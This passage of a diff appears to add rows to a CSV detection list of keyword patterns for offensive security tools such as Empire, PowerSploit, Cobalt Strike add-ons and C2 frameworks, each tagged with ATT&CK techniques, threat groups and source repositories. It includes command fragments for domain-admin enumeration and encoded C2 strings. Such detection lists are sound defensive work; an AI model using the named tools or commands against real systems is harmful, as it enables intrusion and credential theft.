Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Write-HijackDll*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Write-Output 127.0.0.1:1111*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z"
+"*WritePayloadDllTransacted*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*Write-PortscanOut*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a 
post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Write-ServiceBinary*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Write-UserAddMSI*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*ws://localhost:58082*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z"
+"*wscript_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*wsl kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl execution","N/A","N/A","N/A","N/A","N/A","N/A"
+"*WSPCoerce.ex*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z"
+"*WSPCoerce-main*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z"
+"*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*WSUSpendu*","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. 
to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wsuxploit*","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","3","267","50","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z"
+"*wts_enum_remote_processes*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z"
+"*wumb0/rust_bof*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z"
+"*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*www.exploit-db.com/download/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*www.ip-api.com*","greyware_tool_keyword","ip-api.com","get public ip address","T1016 - T1071.001","TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*www.kali.org/get-kali/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*www.securityfocus.com/archive/1/514379*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*www.vsecurity.com/download/tools/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*www.wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wxfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wxfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*WytdIEluamVjdGVkIHRoZSA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*-x *net group *Domain Admins* /domain*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*X32_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*X64_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*x64PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,,
+"*x86_64-unknown-uefi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z"
+"*x86PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team 
activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*x86PELoader/test_agent_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*x86PELoader/test_agent_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*x86PELoader/test_proxy_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*x86PELoader/test_proxy_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*x90skysn3k*","offensive_tool_keyword","Github Username","Github username known for password exploitation and offensive 
tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x90skysn3k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*xato-net-10-million-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*X-C2-Beacon*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*xcopy /y /d *\msquic_schannel\msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","0","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z"
